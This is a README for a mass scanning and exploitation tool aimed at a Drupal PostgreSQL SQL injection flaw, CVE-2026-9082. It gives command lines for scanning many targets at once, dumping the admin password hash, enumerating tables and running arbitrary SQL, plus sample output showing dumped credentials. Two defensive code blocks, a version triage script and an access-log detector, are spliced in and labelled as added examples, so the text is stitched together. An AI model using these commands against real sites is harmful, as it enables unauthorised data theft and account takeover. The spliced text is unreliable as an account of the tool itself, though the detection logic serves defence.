
CVE-2026-9082 — Drupal PostgreSQL SQL Injection

Mass Scanner & Exploitation Tool

Unauthenticated SQL Injection in Drupal Core (PostgreSQL)
JSON:API filter array key injection via PDO placeholder name abuse


Overview

CVE-2026-9082 is a Highly Critical SQL injection vulnerability in Drupal Core affecting all PostgreSQL-backed sites running Drupal 8.0 through 11.3.9. Added to the CISA Known Exploited Vulnerabilities (KEV) catalog on 2026-05-22 — actively exploited in the wild.

Impact

| Severity | CVSS | Auth Required | Attack Vector   |
|----------|------|---------------|-----------------|
| Critical | 9.8+ | None          | HTTP (JSON:API) |
  • Data exfiltration — extract databases, users, password hashes
  • Privilege escalation — create admin accounts, modify content
  • Remote code execution — in some configurations via pg_exec() or COPY ... PROGRAM

Affected Versions

| Status        | Versions                                   |
|---------------|--------------------------------------------|
| ❌ Vulnerable | Drupal 8.0.0 → 11.3.9 (PostgreSQL backend) |
| ✅ Fixed      | 11.3.10, 11.2.12, 10.6.9, 10.5.10          |
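A defender's first job with this table is fleet triage: which sites are on the PostgreSQL driver and below the fixed release for their branch. The following is an added example, not code from this repository, that encodes the table above as per-branch minimum fixed releases and classifies an inventory. It assumes Drupal's driver name `pgsql` identifies the PostgreSQL backend, and that a branch with no fixed release in the table (for example 9.5.x or 10.4.x) is end-of-life and should be reported as vulnerable; the inventory entries are constructed for the demonstration.

```python
import re

# Earliest fixed release on each branch, taken from the Affected Versions table.
FIXED_RELEASES = {
    (11, 3): (11, 3, 10),
    (11, 2): (11, 2, 12),
    (10, 6): (10, 6, 9),
    (10, 5): (10, 5, 10),
}
FIRST_VULNERABLE = (8, 0, 0)
LAST_VULNERABLE = (11, 3, 9)


def parse_version(text):
    """Parse '11.3.9' or Drupal 7 style '7.98' into a (major, minor, patch) tuple."""
    m = re.fullmatch(r"\s*(\d+)\.(\d+)(?:\.(\d+))?\s*", text)
    if not m:
        raise ValueError(f"unrecognised Drupal version: {text!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def triage(version, db_driver):
    """Classify one site as 'not-affected', 'vulnerable', 'patched' or 'unknown'.

    db_driver is Drupal's database driver name ('pgsql', 'mysql', 'sqlite');
    the flaw lives in the pgsql driver only, so other backends are not affected.
    """
    if db_driver != "pgsql":
        return "not-affected"
    v = parse_version(version)
    if v < FIRST_VULNERABLE:
        return "not-affected"           # Drupal 7 and earlier are outside the advisory
    if v > LAST_VULNERABLE and v[:2] not in FIXED_RELEASES:
        return "unknown"                # newer than the advisory covers; re-check the advisory
    fixed = FIXED_RELEASES.get(v[:2])
    if fixed is None:
        # Assumption: a branch with no fixed release in the table is end-of-life and
        # stays vulnerable; the remediation is to move to a supported branch.
        return "vulnerable"
    return "patched" if v >= fixed else "vulnerable"


# Constructed sample inventory for the demonstration (hostnames are placeholders).
INVENTORY = [
    {"host": "cms-1.example.test", "version": "11.3.9", "db": "pgsql"},
    {"host": "cms-2.example.test", "version": "11.3.10", "db": "pgsql"},
    {"host": "cms-3.example.test", "version": "10.4.7", "db": "pgsql"},
    {"host": "cms-4.example.test", "version": "11.3.9", "db": "mysql"},
    {"host": "legacy.example.test", "version": "7.98", "db": "pgsql"},
]


def triage_inventory(inventory):
    """Map each host to its status so the vulnerable ones can be patched first."""
    return {site["host"]: triage(site["version"], site["db"]) for site in inventory}


if __name__ == "__main__":
    for host, status in triage_inventory(INVENTORY).items():
        print(f"{host:24} {status}")
```

The driver check matters as much as the version: a site on 11.3.9 with MySQL is not affected by this advisory, while a PostgreSQL site on an unsupported branch has no patch to apply and needs a branch upgrade.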

How It Works

The flaw exists in core/modules/pgsql/src/EntityQuery/Condition.php. The translateCondition() method uses user-controlled array keys from JSON:API filter parameters to construct PDO placeholder names. PDO only accepts [a-zA-Z0-9_] in a placeholder name, so the placeholder ends at the first character outside that set; in a key containing ), everything after the ) is left in the query as literal SQL.

JSON:API Filter → array key with SQL → PDO placeholder truncation → SQL injection
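Because the injection point is the key name rather than a filter value, it is visible in plain web-server access logs: a legitimate JSON:API filter key is a label or field path, while an exploit key must carry characters that PDO refuses in a placeholder. The following is an added detection example, not code from this repository or from Drupal. It assumes an allowlist of `[A-Za-z0-9_.-]` for key segments (dots for paths such as `uid.name`, hyphens for client-chosen labels; an assumption for this example, not a rule from the advisory), that JSON:API is mounted at its default `/jsonapi/` base path, and that the access log lines are in combined log format; the log lines are constructed for the demonstration.

```python
import re
from urllib.parse import parse_qsl

# Characters PDO accepts in a named placeholder, as stated in the README.
PDO_PLACEHOLDER_CHARS = r"[A-Za-z0-9_]"

# Assumed allowlist for the bracketed segments of a legitimate JSON:API filter
# parameter name: condition labels and field paths such as "uid.name" or "field-tags".
FILTER_SEGMENT_OK = re.compile(r"^[A-Za-z0-9_.\-]*$")

BRACKET_SEGMENTS = re.compile(r"\[([^\]]*)\]")
REQUEST_TARGET = re.compile(r'"[A-Z]+ (\S+) HTTP/')

# Assumption: JSON:API is mounted at its default base path.
JSONAPI_PREFIX = "/jsonapi/"


def placeholder_split(segment):
    """Show how PDO reads a key segment used as a placeholder name: the leading run
    of [A-Za-z0-9_] is the placeholder, the remainder is what stays in the query."""
    prefix = re.match(PDO_PLACEHOLDER_CHARS + r"*", segment).group(0)
    return prefix, segment[len(prefix):]


def filter_segments(param_name):
    """'filter[label][condition][path]' -> ['label', 'condition', 'path']."""
    if not param_name.startswith("filter["):
        return []
    return BRACKET_SEGMENTS.findall(param_name)


def suspicious_filter_segments(query_string):
    """Return filter key segments with characters outside the allowlist.

    Only parameter names are examined: the flaw is in how keys become placeholder
    names, and filter values are free text that legitimately contains anything.
    parse_qsl decodes percent-encoding, so %5B/%5D brackets are handled too."""
    found = []
    for name, _value in parse_qsl(query_string, keep_blank_values=True):
        for segment in filter_segments(name):
            if not FILTER_SEGMENT_OK.match(segment):
                found.append(segment)
    return found


def scan_access_log(lines):
    """Return (line_no, client_ip, bad_segments) for JSON:API requests whose
    filter keys would not survive as plain PDO placeholder names."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        m = REQUEST_TARGET.search(line)
        if not m:
            continue
        path, _, query = m.group(1).partition("?")
        if not path.startswith(JSONAPI_PREFIX) or not query:
            continue
        bad = suspicious_filter_segments(query)
        if bad:
            hits.append((line_no, line.split(" ", 1)[0], bad))
    return hits


# Constructed sample access log: two ordinary JSON:API filters, one malformed key on
# a JSON:API route, and one malformed key on a route JSON:API does not serve.
LOG_LINES = [
    '203.0.113.5 - - [22/May/2026:10:01:02 +0000] "GET /jsonapi/node/article?filter%5Btitle%5D%5Bvalue%5D=Hello HTTP/1.1" 200 512',
    '203.0.113.5 - - [22/May/2026:10:01:03 +0000] "GET /jsonapi/node/article?filter%5Buid.name%5D=admin HTTP/1.1" 200 812',
    '198.51.100.7 - - [22/May/2026:10:02:11 +0000] "GET /jsonapi/node/article?filter%5Btitle)%20x%5D%5Bvalue%5D=1 HTTP/1.1" 500 0',
    '198.51.100.7 - - [22/May/2026:10:02:15 +0000] "GET /node/1?filter%5Ba)b%5D=1 HTTP/1.1" 200 2048',
]


if __name__ == "__main__":
    for line_no, ip, bad in scan_access_log(LOG_LINES):
        for segment in bad:
            kept, leftover = placeholder_split(segment)
            print(f"line {line_no} from {ip}: key {segment!r} -> placeholder {kept!r}, leftover {leftover!r}")
```

The allowlist is deliberately wider than PDO's own `[A-Za-z0-9_]` so that ordinary dotted field paths do not page anyone; anything outside it is worth a look regardless of whether the request returned 200 or 500, since a time-based probe succeeds quietly. The same check, applied to the query string before it reaches Drupal, is a reasonable WAF rule until the fixed release is deployed.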

Features

  • Mass scanner — scan hundreds of targets concurrently
  • Single target mode — check individual Drupal sites
  • Time-based detection — pg_sleep() blind SQLi confirmation
  • Boolean-based detection — row count comparison
  • Version extraction — identify PostgreSQL version
  • Database info — extract current user and database name
  • Admin credential dump — username, email, password hash (uid=1)
  • Table listing — enumerate all public tables
  • Custom SQL queries — run any extraction query
  • Proxy support — route through Burp Suite or similar
  • Output to file — save mass scan results
  • Colored terminal output — easy to read results

Installation

Prerequisites

  • Python 3.8+
  • pip (Python package manager)

Install Dependencies

# Clone the repo
git clone https://github.com/ridhinva/CVE-2026-9082.git
cd CVE-2026-9082

# Install requirements
pip install requests

That's it! Only one dependency — requests.


Usage

🕵️ Check Single Target

python3 cve_2026_9082_scanner.py -u https://target.com --check

📡 Mass Scan Multiple Targets

python3 cve_2026_9082_scanner.py -f targets.txt

targets.txt format:

https://target1.com
target2.com
192.168.1.100

🔓 Extract PostgreSQL Version

python3 cve_2026_9082_scanner.py -u https://target.com --version

🗄️ Extract Database Info

python3 cve_2026_9082_scanner.py -u https://target.com --dbinfo

👤 Dump Admin Credentials (uid=1)

python3 cve_2026_9082_scanner.py -u https://target.com --admin

📋 List All Tables

python3 cve_2026_9082_scanner.py -u https://target.com --tables

💉 Custom SQL Query

python3 cve_2026_9082_scanner.py -u https://target.com --query "SELECT usename FROM pg_catalog.pg_user"

Save Results to File

python3 cve_2026_9082_scanner.py -f targets.txt -o results.txt

Use Proxy (Burp Suite)

python3 cve_2026_9082_scanner.py -u https://target.com --check --proxy http://127.0.0.1:8080

Customize Timing

# Increase sleep time for time-based detection (default: 5s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --delay 10

# Increase HTTP timeout for slow targets (default: 30s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --timeout 60

Command Reference

| Flag              | Description                                  |
|-------------------|----------------------------------------------|
| -u, --url         | Single target URL                            |
| -f, --file        | File with targets (one per line)             |
| -o, --output      | Save scan results to file                    |
| --check           | Check if target is vulnerable                |
| --version         | Extract PostgreSQL version                   |
| --dbinfo          | Extract DB user and database name            |
| --admin           | Extract Drupal admin credentials (uid=1)     |
| --tables          | List all database tables                     |
| --query           | Custom SQL extraction query                  |
| --threads         | Threads for mass scan (default: 20)          |
| --timeout         | HTTP request timeout (default: 30s)          |
| --delay           | pg_sleep delay for detection (default: 5s)   |
| --no-ssl-verify   | Skip TLS certificate verification            |
| --proxy           | HTTP proxy (e.g., http://127.0.0.1:8080)     |

Example Output

Vulnerable Target

╔══════════════════════════════════════════════════════════════╗
║          CVE-2026-9082 - Drupal PostgreSQL SQLi             ║
║       Mass Scanner + Exploitation Tool v1.0.0               ║
╚══════════════════════════════════════════════════════════════╝
  CISA KEV: Added 2026-05-22  |  Advisory: SA-CORE-2026-004

[*] Checking: https://vulnerable-drupal-site.com

[!!] VULNERABLE - https://vulnerable-drupal-site.com
      Method: time-based (+5.2s)
      Resource: node/article

Admin Credential Dump

[+] username: admin
[+] email: admin@example.com
[+] pass_hash: $S$E8gJ8yJ8...hashed_password...

References

| Source          | Link              |
|-----------------|-------------------|
| Drupal Advisory | SA-CORE-2026-004  |
| CISA KEV        | CVE-2026-9082     |
| Patch Commit    | ea9524d9          |
| NVD Entry       | CVE-2026-9082     |
| Discoverer      | Michael Maturi    |

⚠️ Disclaimer

This tool is for authorized security testing, educational purposes, and ethical research only.

Unauthorized access to computer systems is illegal. The authors assume no liability and are not responsible for any misuse or damage caused by this program.


Author

Ridhin V A (@ridhinva) — Bug bounty hunter & security researcher

Built because CISA KEV said it's being exploited in the wild. Patch your Drupal sites.
